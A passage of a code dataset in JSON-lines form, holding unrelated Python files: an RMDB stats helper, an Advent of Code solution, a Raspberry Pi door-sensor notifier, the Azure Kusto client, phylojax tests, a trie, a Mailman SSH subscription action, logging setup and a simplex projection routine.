enumerate(comment):\n if len(m) > 40:\n comment[i] = ' '.join(textwrap.wrap(m, 40))\n entry = {'rmdb_id': e.rmdb_id, 'version': e.version, 'construct_count': e.construct_count, 'data_count': e.data_count, 'authors': e.authors, 'comments': ' '.join(comment), 'title': e.publication.title, 'latest': e.supercede_by}\n if e.type == \"SS\" or e.type == \"DC\":\n SS_entries.append(entry)\n elif e.type == \"TT\":\n TT_entries.append(entry)\n elif e.type == \"MM\":\n MM_entries.append(entry)\n elif e.type == \"MR\":\n MR_entries.append(entry)\n elif e.type == \"MA\":\n MA_entries.append(entry)\n\n constructs.append({'name': c['name'], 'SS_entry': SS_entries, 'TT_entry': TT_entries, 'MM_entry': MM_entries, 'MA_entry': MA_entries, 'MR_entry': MR_entries})\n return constructs\n\n\ndef get_rmdb_category(flag):\n latest_versions = RMDBEntry.objects.values('rmdb_id').annotate(latest_version=Max('version'))\n q_statement = Q()\n for pair in latest_versions:\n q_statement |= (Q(entry__rmdb_id=pair['rmdb_id']) & Q(entry__version=pair['latest_version']))\n\n LatestConstructSec = ConstructSection.objects.filter(q_statement)\n\n if flag == \"puzzle\":\n names_d = LatestConstructSec.filter(name__icontains='Puzzle').values('name').distinct()\n elif flag == \"eterna\":\n names_d = LatestConstructSec.filter(name__icontains='EteRNA').values('name').distinct()\n else:\n names_d = LatestConstructSec.exclude(name__icontains='EteRNA').exclude(name__icontains='Puzzle').values('name').distinct()\n names_d = names_d.order_by('name')\n return browse_json_list(names_d)\n\n","repo_name":"DasLab/Server_RMDB","sub_path":"src/util/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"42010684078","text":"def check_cycle(cycle, x):\n if (cycle-20) % 40 == 0:\n return cycle * x\n\n return 0\n\ndef check_x(cycle, x):\n c = (cycle - 1) % 40\n\n if x-1 <= c <= x+1:\n return True \n \n return False\n\n\ndef count_signal_strength(lines):\n x = 1\n cycle = 0\n signal_strength_sum = 0\n letters = \"\"\n\n for line in lines:\n\n if line[0:4] == \"noop\":\n cycle += 1\n signal_strength_sum += check_cycle(cycle, x)\n if check_x(cycle, x):\n letters += \"#\"\n else:\n letters += \" \"\n else:\n val = line.split(\" \")\n\n for i in range(0, 2):\n cycle += 1\n signal_strength_sum += check_cycle(cycle, x)\n if check_x(cycle, x):\n letters += \"#\"\n else:\n letters += \" \"\n\n if i == 1:\n x += int(val[1])\n \n return signal_strength_sum, letters\n\nwith open(\"input.txt\", \"r\") as f:\n lines = [l.strip() for l in f.readlines()]\n\nday10 = count_signal_strength(lines)\nprint(\"Part 1: The sum of the signal strengths is\", day10[0])\n\nletters = \"\"\nfor i in range(0,len(day10[1])):\n if i % 40 == 0:\n letters += \"\\n\"\n letters += day10[1][i]\n\nprint(\"Part 2: The solution is:\", \"\\n\", letters)","repo_name":"sagakortesaari/adventofcode","sub_path":"2022/10/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2314841057","text":"from PyQt5.QtWidgets import QMessageBox\n\n\ndef alert(self, str, call_code):\n dlg = QMessageBox(self)\n dlg.setWindowTitle(\"Предупреждение\")\n if call_code == 1:\n dlg.setText(f\"Вы взяли:\\n{str}\")\n elif call_code == 2:\n dlg.setText(f\"Вы вернули:\\n{str}\")\n button = dlg.exec()\n if button == QMessageBox.Ok:\n print(\"OK!\")","repo_name":"Viteeeq/KMU-Project-test","sub_path":"app/alerts.py","file_name":"alerts.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17915681670","text":"#!/usr/bin/env python3\n\n#For use with normally closed (NC) Reed Switch connected to ground & GPIO input\n#If using normally open (NO), simply reverse the booleans.\n\nimport RPi.GPIO as GPIO\nimport time\nimport smtplib\nimport _thread\nimport cred\n\ntry:\n need_clean = False\n\n #Message Template\n #Leading '\\n' is required for sending an email with ':' (SMS/MMS Gateway)\n MSG = '\\nDoor was '\n DOOR_MSG = {True:'opened', False:'closed'}\n\n #Setting up connection to SMTP Server for sending email/sms.\n print('Setting up SMS...')\n #Function to call on new thread\n #Because of race conditions, this needs to be done quickly or on diff thread\n def send_msg(opened:bool):\n #Replace args with your email provider's SMTP details\n server = smtplib.SMTP( \"smtp.gmail.com\", 587 )\n server.starttls()\n server.login( cred.FROM, cred.PASS )\n #Compile message string to print and send.\n #Ex: '\\nDoor was closed at 5:50:20 PM'\n #This way is used because it is quickest and we have race conditions!\n str_print =''.join([MSG, DOOR_MSG[opened], ' at ',\n time.strftime('%I:%M:%S %p')])\n print(str_print)\n server.sendmail(cred.FROM, cred.TO, str_print)\n server.quit()\n\n\n\n #Initializing GPIO\n print('Setting up hardware...')\n PIN = 12\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n #next_state to check for to send message\n next_state = True\n\n need_clean = True\n\n #Running actual program\n print('Ready!')\n #Run infinitely\n while True:\n #Check for next state\n if GPIO.input(PIN) == next_state:\n #Send message on different thread\n _thread.start_new_thread(send_msg, (next_state,))\n #Negate next_state\n next_state = not next_state\n time.sleep(0.3)\n \nexcept KeyboardInterrupt:\n GPIO.cleanup() #For Keyboard Interrupt exit\n need_clean = False\n\nif need_clean: \n GPIO.cleanup() #For normal exit\nprint('\\nEnd!')\n","repo_name":"proganalysis/python3_types","sub_path":"Result/4079files/source_2/3789.py","file_name":"3789.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"449183580","text":"import socket\nimport sys\nfrom datetime import timedelta\nfrom typing import AnyStr, IO, List, Optional, TYPE_CHECKING, Tuple, Union\n\nimport requests\nimport requests.adapters\nfrom requests import Response\nfrom urllib3.connection import HTTPConnection\n\nfrom azure.core.tracing.decorator import distributed_trace\nfrom azure.core.tracing import SpanKind\n\nfrom azure.kusto.data._telemetry import Span, MonitoredActivity\n\nfrom .client_base import ExecuteRequestParams, _KustoClientBase\nfrom .client_request_properties import ClientRequestProperties\nfrom .data_format import DataFormat\nfrom .exceptions import KustoClosedError, KustoNetworkError\n\nfrom .kcsb import KustoConnectionStringBuilder\nfrom .response import KustoResponseDataSet, KustoStreamingResponseDataSet\nfrom .streaming_response import JsonTokenReader, StreamingDataSetEnumerator\n\nif TYPE_CHECKING:\n pass\n\n\nclass HTTPAdapterWithSocketOptions(requests.adapters.HTTPAdapter):\n def __init__(self, *args, **kwargs):\n self.socket_options = kwargs.pop(\"socket_options\", None)\n super(HTTPAdapterWithSocketOptions, self).__init__(*args, **kwargs)\n\n def __getstate__(self):\n state = super(HTTPAdapterWithSocketOptions, self).__getstate__()\n state[\"socket_options\"] = self.socket_options\n return state\n\n def init_poolmanager(self, *args, **kwargs):\n if self.socket_options is not None:\n kwargs[\"socket_options\"] = self.socket_options\n super(HTTPAdapterWithSocketOptions, self).init_poolmanager(*args, **kwargs)\n\n\nclass KustoClient(_KustoClientBase):\n \"\"\"\n Kusto client for Python.\n The client is a wrapper around the Kusto REST API.\n To read more about it, go to https://docs.microsoft.com/en-us/azure/kusto/api/rest/\n\n The primary methods are:\n `execute_query`: executes a KQL query against the Kusto service.\n `execute_mgmt`: executes a KQL control command against the Kusto service.\n \"\"\"\n\n _mgmt_default_timeout = timedelta(hours=1)\n _query_default_timeout = timedelta(minutes=4)\n _streaming_ingest_default_timeout = timedelta(minutes=10)\n _client_server_delta = timedelta(seconds=30)\n\n # The maximum amount of connections to be able to operate in parallel\n _max_pool_size = 100\n\n def __init__(self, kcsb: Union[KustoConnectionStringBuilder, str]):\n \"\"\"\n Kusto Client constructor.\n :param kcsb: The connection string to initialize KustoClient.\n :type kcsb: azure.kusto.data.KustoConnectionStringBuilder or str\n \"\"\"\n super().__init__(kcsb, False)\n\n # Create a session object for connection pooling\n self._session = requests.Session()\n\n adapter = HTTPAdapterWithSocketOptions(\n socket_options=(HTTPConnection.default_socket_options or []) + self.compose_socket_options(), pool_maxsize=self._max_pool_size\n )\n self._session.mount(\"http://\", adapter)\n self._session.mount(\"https://\", adapter)\n\n def close(self):\n if not self._is_closed:\n self._session.close()\n if self._aad_helper:\n self._aad_helper.close()\n super().close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n\n def set_proxy(self, proxy_url: str):\n super().set_proxy(proxy_url)\n self._session.proxies = {\"http\": proxy_url, \"https\": proxy_url}\n\n def set_http_retries(self, max_retries: int):\n \"\"\"\n Set the number of HTTP retries to attempt\n \"\"\"\n adapter = HTTPAdapterWithSocketOptions(\n socket_options=(HTTPConnection.default_socket_options or []) + self.compose_socket_options(),\n pool_maxsize=self._max_pool_size,\n max_retries=max_retries,\n )\n self._session.mount(\"http://\", adapter)\n self._session.mount(\"https://\", adapter)\n\n @staticmethod\n def compose_socket_options() -> List[Tuple[int, int, int]]:\n # Sends TCP Keep-Alive after MAX_IDLE_SECONDS seconds of idleness, once every INTERVAL_SECONDS seconds, and closes the connection after MAX_FAILED_KEEPALIVES failed pings (e.g. 20 => 1:00:30)\n MAX_IDLE_SECONDS = 30\n INTERVAL_SECONDS = 180 # Corresponds to Azure Load Balancer Service 4 minute timeout, with 1 minute of slack\n MAX_FAILED_KEEPALIVES = 20\n\n if (\n sys.platform == \"linux\"\n and hasattr(socket, \"SOL_SOCKET\")\n and hasattr(socket, \"SO_KEEPALIVE\")\n and hasattr(socket, \"TCP_KEEPIDLE\")\n and hasattr(socket, \"TCP_KEEPINTVL\")\n and hasattr(socket, \"TCP_KEEPCNT\")\n ):\n return [\n (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1),\n (socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, MAX_IDLE_SECONDS),\n (socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, INTERVAL_SECONDS),\n (socket.IPPROTO_TCP, socket.TCP_KEEPCNT, MAX_FAILED_KEEPALIVES),\n ]\n elif (\n sys.platform == \"win32\"\n and hasattr(socket, \"SOL_SOCKET\")\n and hasattr(socket, \"SO_KEEPALIVE\")\n and hasattr(socket, \"TCP_KEEPIDLE\")\n and hasattr(socket, \"TCP_KEEPCNT\")\n ):\n return [\n (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1),\n (socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, MAX_IDLE_SECONDS),\n (socket.IPPROTO_TCP, socket.TCP_KEEPCNT, MAX_FAILED_KEEPALIVES),\n ]\n elif sys.platform == \"darwin\" and hasattr(socket, \"SOL_SOCKET\") and hasattr(socket, \"SO_KEEPALIVE\") and hasattr(socket, \"IPPROTO_TCP\"):\n TCP_KEEPALIVE = 0x10\n return [(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1), (socket.IPPROTO_TCP, TCP_KEEPALIVE, INTERVAL_SECONDS)]\n else:\n return []\n\n def execute(self, database: Optional[str], query: str, properties: Optional[ClientRequestProperties] = None) -> KustoResponseDataSet:\n \"\"\"\n Executes a query or management command.\n :param Optional[str] database: Database against query will be executed. If not provided, will default to the \"Initial Catalog\" value in the connection string\n :param str query: Query to be executed.\n :param azure.kusto.data.ClientRequestProperties properties: Optional additional properties.\n :return: Kusto response data set.\n :rtype: azure.kusto.data.response.KustoResponseDataSet\n \"\"\"\n query = query.strip()\n if query.startswith(\".\"):\n return self.execute_mgmt(database, query, properties)\n return self.execute_query(database, query, properties)\n\n @distributed_trace(name_of_span=\"KustoClient.query_cmd\", kind=SpanKind.CLIENT)\n def execute_query(self, database: Optional[str], query: str, properties: Optional[ClientRequestProperties] = None) -> KustoResponseDataSet:\n \"\"\"\n Execute a KQL query.\n To learn more about KQL go to https://docs.microsoft.com/en-us/azure/kusto/query/\n :param Optional[str] database: Database against query will be executed. If not provided, will default to the \"Initial Catalog\" value in the connection string\n :param str query: Query to be executed.\n :param azure.kusto.data.ClientRequestProperties properties: Optional additional properties.\n :return: Kusto response data set.\n :rtype: azure.kusto.data.response.KustoResponseDataSet\n \"\"\"\n database = self._get_database_or_default(database)\n Span.set_query_attributes(self._kusto_cluster, database, properties)\n\n return self._execute(self._query_endpoint, database, query, None, self._query_default_timeout, properties)\n\n @distributed_trace(name_of_span=\"KustoClient.control_cmd\", kind=SpanKind.CLIENT)\n def execute_mgmt(self, database: Optional[str], query: str, properties: Optional[ClientRequestProperties] = None) -> KustoResponseDataSet:\n \"\"\"\n Execute a KQL control command.\n To learn more about KQL control commands go to https://docs.microsoft.com/en-us/azure/kusto/management/\n :param Optional[str] database: Database against query will be executed. If not provided, will default to the \"Initial Catalog\" value in the connection string\n :param str query: Query to be executed.\n :param azure.kusto.data.ClientRequestProperties properties: Optional additional properties.\n :return: Kusto response data set.\n :rtype: azure.kusto.data.response.KustoResponseDataSet\n \"\"\"\n database = self._get_database_or_default(database)\n Span.set_query_attributes(self._kusto_cluster, database, properties)\n\n return self._execute(self._mgmt_endpoint, database, query, None, self._mgmt_default_timeout, properties)\n\n @distributed_trace(name_of_span=\"KustoClient.streaming_ingest\", kind=SpanKind.CLIENT)\n def execute_streaming_ingest(\n self,\n database: Optional[str],\n table: str,\n stream: IO[AnyStr],\n stream_format: Union[DataFormat, str],\n properties: Optional[ClientRequestProperties] = None,\n mapping_name: str = None,\n ):\n \"\"\"\n Execute streaming ingest against this client\n If the Kusto service is not configured to allow streaming ingestion, this may raise an error\n To learn more about streaming ingestion go to:\n https://docs.microsoft.com/en-us/azure/data-explorer/ingest-data-streaming\n :param Optional[str] database: Target database. If not provided, will default to the \"Initial Catalog\" value in the connection string\n :param str table: Target table.\n :param io.BaseIO stream: stream object which contains the data to ingest.\n :param DataFormat stream_format: Format of the data in the stream.\n :param ClientRequestProperties properties: additional request properties.\n :param str mapping_name: Pre-defined mapping of the table. Required when stream_format is json/avro.\n \"\"\"\n database = self._get_database_or_default(database)\n Span.set_streaming_ingest_attributes(self._kusto_cluster, database, table, properties)\n\n stream_format = stream_format.kusto_value if isinstance(stream_format, DataFormat) else DataFormat[stream_format.upper()].kusto_value\n endpoint = self._streaming_ingest_endpoint + database + \"/\" + table + \"?streamFormat=\" + stream_format\n if mapping_name is not None:\n endpoint = endpoint + \"&mappingName=\" + mapping_name\n\n self._execute(endpoint, database, None, stream, self._streaming_ingest_default_timeout, properties)\n\n def _execute_streaming_query_parsed(\n self,\n database: Optional[str],\n query: str,\n timeout: timedelta = _KustoClientBase._query_default_timeout,\n properties: Optional[ClientRequestProperties] = None,\n ) -> StreamingDataSetEnumerator:\n response = self._execute(self._query_endpoint, database, query, None, timeout, properties, stream_response=True)\n response.raw.decode_content = True\n return StreamingDataSetEnumerator(JsonTokenReader(response.raw))\n\n @distributed_trace(name_of_span=\"KustoClient.streaming_query\", kind=SpanKind.CLIENT)\n def execute_streaming_query(\n self,\n database: Optional[str],\n query: str,\n timeout: timedelta = _KustoClientBase._query_default_timeout,\n properties: Optional[ClientRequestProperties] = None,\n ) -> KustoStreamingResponseDataSet:\n \"\"\"\n Execute a KQL query without reading it all to memory.\n The resulting KustoStreamingResponseDataSet will stream one table at a time, and the rows can be retrieved sequentially.\n\n :param Optional[str] database: Database against query will be executed. If not provided, will default to the \"Initial Catalog\" value in the connection string\n :param str query: Query to be executed.\n :param timedelta timeout: timeout for the query to be executed\n :param azure.kusto.data.ClientRequestProperties properties: Optional additional properties.\n :return KustoStreamingResponseDataSet:\n \"\"\"\n Span.set_query_attributes(self._kusto_cluster, database, properties)\n\n return KustoStreamingResponseDataSet(self._execute_streaming_query_parsed(database, query, timeout, properties))\n\n def _execute(\n self,\n endpoint: str,\n database: Optional[str],\n query: Optional[str],\n payload: Optional[IO[AnyStr]],\n timeout: timedelta,\n properties: Optional[ClientRequestProperties] = None,\n stream_response: bool = False,\n ) -> Union[KustoResponseDataSet, Response]:\n \"\"\"Executes given query against this client\"\"\"\n if self._is_closed:\n raise KustoClosedError()\n self.validate_endpoint()\n request_params = ExecuteRequestParams(\n database,\n payload,\n properties,\n query,\n timeout,\n self._request_headers,\n self._mgmt_default_timeout,\n self._client_server_delta,\n self.client_details,\n )\n json_payload = request_params.json_payload\n request_headers = request_params.request_headers\n timeout = request_params.timeout\n if self._aad_helper:\n request_headers[\"Authorization\"] = self._aad_helper.acquire_authorization_header()\n\n # trace http post call for response\n invoker = lambda: self._session.post(\n endpoint,\n headers=request_headers,\n json=json_payload,\n data=payload,\n timeout=timeout.seconds,\n stream=stream_response,\n allow_redirects=False,\n )\n\n try:\n response = MonitoredActivity.invoke(\n invoker, name_of_span=\"KustoClient.http_post\", tracing_attributes=Span.create_http_attributes(\"POST\", endpoint, request_headers)\n )\n except Exception as e:\n raise KustoNetworkError(endpoint, None if properties is None else properties.client_request_id) from e\n\n if stream_response:\n try:\n response.raise_for_status()\n if 300 <= response.status_code < 400:\n raise Exception(\"Unexpected redirection, got status code: \" + str(response.status))\n return response\n except Exception as e:\n raise self._handle_http_error(e, self._query_endpoint, None, response, response.status_code, response.json(), response.text)\n\n response_json = None\n try:\n if 300 <= response.status_code < 400:\n raise Exception(\"Unexpected redirection, got status code: \" + str(response.status))\n response_json = response.json()\n response.raise_for_status()\n except Exception as e:\n raise self._handle_http_error(e, endpoint, payload, response, response.status_code, response_json, response.text)\n # trace response processing\n return MonitoredActivity.invoke(lambda: self._kusto_parse_by_endpoint(endpoint, response_json), name_of_span=\"KustoClient.processing_response\")\n","repo_name":"Azure/azure-kusto-python","sub_path":"azure-kusto-data/azure/kusto/data/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":15152,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"72"} +{"seq_id":"15926714498","text":"import jax.numpy as np\nimport pytest\nfrom jax import grad, vjp\n\nimport phylojax.treelikelihood as treelikelihood\nfrom phylojax.io import read_tree_and_alignment\nfrom phylojax.sitepattern import get_dna_leaves_partials_compressed\nfrom phylojax.tree import postorder_indices, preorder_indices\n\n\ndef extract_branch_lengths(tree):\n nodes = [None] * (len(tree.taxon_namespace) * 2 - 1)\n for node in tree.postorder_node_iter():\n nodes[node.index] = node.edge_length\n nodes.pop()\n return np.array([[float(x) for x in nodes]])\n\n\ndef test_calculate_unrooted_efficient(hello_tree_file, hello_fasta_file, jc69_model):\n tree, dna = read_tree_and_alignment(hello_tree_file, hello_fasta_file, False, False)\n indices = postorder_indices(tree)\n pre_indices = preorder_indices(tree)\n branch_lengths = extract_branch_lengths(tree)\n bls = np.expand_dims(branch_lengths, axis=-1)\n partials, weights = get_dna_leaves_partials_compressed(dna)\n tip_partials = np.array(partials[: len(tree.taxon_namespace)])\n frequencies = np.broadcast_to(\n jc69_model.frequencies, branch_lengths.shape[:-1] + (4,)\n )\n frequencies = np.expand_dims(frequencies, axis=-2)\n mats = jc69_model.p_t(bls)\n mats = np.expand_dims(mats, -3)\n props = np.array([[[1.0]]])\n partials = treelikelihood.calculate_partials(\n tip_partials,\n indices,\n mats,\n props,\n )\n\n # calculate log likelihood at every node using upper partials\n uppers = treelikelihood.calculate_upper_partials(partials, pre_indices, mats)\n for i in range(uppers.shape[0]):\n log_p2 = treelikelihood.calculate_treelikelihood_upper(\n partials[i],\n uppers[i],\n weights,\n mats[:, i, ...],\n frequencies,\n props,\n )\n assert -84.852358 == pytest.approx(float(log_p2), 0.0001)\n\n # analytical derivatives\n expected_gradient = (21.0223, -5.34462, -17.7298, -17.7298)\n dmats = jc69_model.dp_dt(bls)\n dmats = np.expand_dims(dmats, -3)\n likelihoods = frequencies @ np.sum(partials[-1], -3)\n gradient = treelikelihood.calculate_treelikelihood_gradient(\n likelihoods, partials, uppers, weights, dmats, frequencies, props\n )\n assert np.allclose(gradient.squeeze(), expected_gradient, rtol=0.0001)\n\n # analytical derivatives using custom_jvp\n log_p3 = treelikelihood.calculate_treelikelihood_custom(\n branch_lengths, tip_partials, weights, (indices, pre_indices), jc69_model, props\n )\n assert -84.852358 == pytest.approx(float(log_p3), 0.0001)\n g = grad(treelikelihood.calculate_treelikelihood_custom)\n gradient2 = g(\n branch_lengths,\n tip_partials,\n weights,\n (np.array(indices, dtype=np.int32), np.array(pre_indices, dtype=np.int32)),\n jc69_model,\n props,\n )\n assert np.allclose(gradient2.squeeze(), expected_gradient, rtol=0.0001)\n\n\ndef test_calculate_unrooted(hello_tree_file, hello_fasta_file, jc69_model):\n tree, dna = read_tree_and_alignment(hello_tree_file, hello_fasta_file, False, False)\n indices = indices = postorder_indices(tree)\n branch_lengths = extract_branch_lengths(tree)\n bls = np.expand_dims(branch_lengths, axis=-1)\n partials, weights = get_dna_leaves_partials_compressed(dna)\n tip_partials = np.array(partials[: len(tree.taxon_namespace)])\n frequencies = np.broadcast_to(\n jc69_model.frequencies, branch_lengths.shape[:-1] + (4,)\n )\n\n def fn(bls):\n mats = jc69_model.p_t(bls)\n return treelikelihood.calculate_treelikelihood(\n tip_partials,\n weights,\n indices,\n np.expand_dims(mats, -3),\n np.expand_dims(frequencies, axis=-2),\n np.array([[[1.0]]]),\n )\n\n y, vjp_fn = vjp(fn, bls)\n gradient = vjp_fn(np.ones(y.shape))[0]\n expected_gradient = (21.0223, -5.34462, -17.7298, -17.7298)\n assert all(\n [\n a == pytest.approx(b, 0.0001)\n for a, b in zip(expected_gradient, np.squeeze(gradient))\n ]\n )\n\n mats = jc69_model.p_t(bls)\n log_p = treelikelihood.calculate_treelikelihood(\n tip_partials,\n weights,\n indices,\n np.expand_dims(mats, -3),\n np.expand_dims(frequencies, axis=-2),\n np.array([[[1.0]]]),\n )\n assert -84.852358 == pytest.approx(float(log_p), 0.0001)\n\n\ndef test_calculate_likelihood_rooted(flu_a_tree_file, flu_a_fasta_file, jc69_model):\n tree, dna = read_tree_and_alignment(flu_a_tree_file, flu_a_fasta_file, True, True)\n indices = postorder_indices(tree)\n partials, weights = get_dna_leaves_partials_compressed(dna)\n tip_partials = np.array(partials[: len(tree.taxon_namespace)])\n branch_lengths = extract_branch_lengths(tree) * 0.001\n mats = jc69_model.p_t(np.expand_dims(branch_lengths, axis=-1))\n frequencies = np.broadcast_to(\n jc69_model.frequencies, branch_lengths.shape[:-1] + (4,)\n )\n\n log_p = treelikelihood.calculate_treelikelihood(\n tip_partials,\n weights,\n indices,\n np.expand_dims(mats, -3),\n np.expand_dims(frequencies, axis=-2),\n np.array([[[1.0]]]),\n )\n assert -4777.616349 == pytest.approx(float(log_p), 0.0001)\n","repo_name":"4ment/phylojax","sub_path":"test/test_likelihood.py","file_name":"test_likelihood.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34703218471","text":"# @TIME : 2019/7/29 下午10:42\n# @File : tire_tree.py\n\nclass TrieNode:\n\n def __init__(self):\n self.children = [None] * 26\n self.isEndOfWord = False\n\nclass Tire:\n\n def __init__(self):\n self.root = self.getNode()\n\n def getNode(self):\n return TrieNode()\n\n def _charToIndex(self, ch):\n \"\"\"Converts key current character into index\n # use only 'a' through 'z' and lower case \"\"\"\n rel = ord(ch) - ord('a')\n return rel\n\n def insert(self, key):\n pCrawl = self.root # 头指针还保留着, 这个设计不错\n length = len(key)\n for level in range(length):\n a = key[level]\n index = self._charToIndex(key[level])\n aa = pCrawl.children[index]\n if not pCrawl.children[index]:\n pCrawl.children[index] = self.getNode()\n\n pCrawl = pCrawl.children[index] # 像LinkList的节点移动\n\n pCrawl.isEndOfWord = True\n\n def search(self, key):\n pCrawl = self.root\n length = len(key)\n for level in range(length):\n a = key[level]\n index = self._charToIndex(key[level])\n if not pCrawl.children[index]:\n return False\n pCrawl = pCrawl.children[index]\n\n return pCrawl != None and pCrawl.isEndOfWord\n\n\nif __name__ == \"__main__\":\n\n keys = ['the', 'a', 'there', 'anaswe', 'any', 'by', 'their']\n\n t = Tire()\n\n for key in keys:\n t.insert(key)\n\n a = 1\n print(t.search('there'))\n\n\n","repo_name":"yjfiejd/2019xuexi","sub_path":"Leetcode-practice/tire_tree.py","file_name":"tire_tree.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40644446530","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom confspirator import groups as conf_group\nfrom confspirator import fields as conf_field\nimport paramiko\n\nfrom adjutant.config import CONF\n\nfrom adjutant_moc.actions import serializers\nfrom adjutant_moc.actions import base\n\n\nclass Mailman(object):\n\n def __init__(self, hostname, port, username, key):\n self.hostname = hostname\n self.port = port\n self.username = username\n self.key = key\n self.client = paramiko.client.SSHClient()\n\n\n def __enter__(self):\n self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n self.client.connect(\n hostname=self.hostname,\n port=self.port,\n username=self.username,\n pkey=paramiko.RSAKey.from_private_key_file(self.key))\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.client.close()\n\n def _execute(self, command):\n stdin, stdout, stderr = self.client.exec_command(command)\n\n errors = stderr.read()\n if errors:\n raise ConnectionError(errors)\n\n # Note(knikolla): Not entirely sure if closing before reading is fine.\n r = stdout.read().decode('utf-8').split('\\n')\n return r\n\n def is_already_subscribed(self, email, list):\n command = ('/usr/lib/mailman/bin/list_members %s' % list)\n return email in self._execute(command)\n\n def subscribe(self, email, list):\n command = (\n 'echo %s | /usr/lib/mailman/bin/add_members -r - %s'\n % (email, list)\n )\n self._execute(command)\n\n\n# TODO knikolla: there are going to be issues here when we\n# add invited users, since get email returns the one who created the task.\nclass MailingListSubscribeAction(base.MocBaseAction):\n\n required = [\n 'email'\n ]\n\n serializer = serializers.MailingListSubscribeSerializer\n\n config_group = conf_group.DynamicNameConfigGroup(\n children=[\n conf_field.StrConfig(\n \"private_key\",\n help_text=\"Location of private key for mailing list server.\",\n default=\"/.ssh/id_rsa\",\n sample_default=\"/.ssh/id_rsa\",\n ),\n conf_field.HostNameConfig(\n \"host\",\n help_text=\"Mailing list server host.\",\n default=\"mail.massopen.cloud\",\n sample_default=\"mail.massopen.cloud\",\n ),\n conf_field.IntConfig(\n \"port\",\n help_text=\"Mailing list server SSH port\",\n default=22,\n sample_default=22,\n ),\n conf_field.StrConfig(\n \"user\",\n help_text=\"Mailing list server user.\",\n default=\"moc-tools\",\n sample_default=\"moc-tools\",\n ),\n conf_field.StrConfig(\n \"list\",\n help_text=\"Mailing list to add users to.\",\n default=\"kaizen-users\",\n sample_default=\"kaizen-users\",\n ),\n ],\n )\n\n def _get_email(self):\n if CONF.identity.username_is_email:\n return self.action.task.keystone_user['username']\n\n def _approve(self):\n try:\n with Mailman(self.config.host, self.config.port,\n self.config.user, self.config.private_key) as mailman:\n if mailman.is_already_subscribed(self._get_email(),\n self.config.list):\n self.add_note('%s already subscribed to mailing list.'\n % self._get_email())\n else:\n mailman.subscribe(self._get_email(), self.config.list)\n self.add_note('%s successfully subscribed to mailing list.'\n % self._get_email())\n except paramiko.ssh_exception.SSHException as e:\n self.add_note('Unable to connect to Mailing List server. '\n 'Proceeding regardless. %s' % str(e))\n\n self.action.state = 'complete'\n self.action.save()\n\n def _submit(self, token_data):\n pass\n","repo_name":"CCI-MOC/adjutant-moc","sub_path":"adjutant_moc/actions/mailing_list.py","file_name":"mailing_list.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40345380575","text":"import logging\n\nlogger = logging.getLogger('scheduler')\n_formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s - %(module)s - %(lineno)d')\n\n\nfh = logging.FileHandler('scheduler_log.log', encoding='utf-8')\nfh.setLevel(logging.DEBUG)\nfh.setFormatter(_formatter)\n\ncr = logging.FileHandler('error.log', encoding='utf-8')\ncr.setLevel(logging.ERROR)\ncr.setFormatter(_formatter)\n\nlogger.addHandler(fh)\nlogger.addHandler(cr)\nlogger.setLevel(logging.DEBUG)\n\n\nif __name__ == '__main__':\n logger.info('Info')\n logger.warning('Warning')\n logger.debug('debug')\n logger.error('error')\n logger.critical('critical')\n","repo_name":"ZakirovRail/scheduler","sub_path":"log_config.py","file_name":"log_config.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17236192959","text":"'''\n Fast projections onto the hypercube with a sum constraint (simplex).\n\n Two methods implemented: one that does direct search of kkt conditions,\n one that does iterative search (interpolation search).\n\n Uses numba to speed up computation.\n\n Benjamin Recht, March 6, 2017\n edited by Sarah Dean, March 7, 2017\n'''\nimport numpy as np\n#from numba import jit\n\n#@jit('void(double[:], intp, double[:], intp[:])', nopython=True, nogil=True)\ndef project_kkt(z, r, zProj, sortOrder):\n '''\n Jitted code to compute the ppr projection. Requires sort by numpy, but\n then goes to town.\n\n Input: z: a vector assumed to be a numpy array\n sortOrder: the arguments that sort z in descending order\n r: the targe sum\n\n Returns: zProj projected onto the set\n '''\n n = len(z)\n\n # check if there is a trivial solution\n if z[sortOrder[r-1]]>=z[sortOrder[r]]+1:\n for i in range(n):\n if i= -theta:\n A+=1\n if z[i] >= 1-theta:\n C+=1\n\n 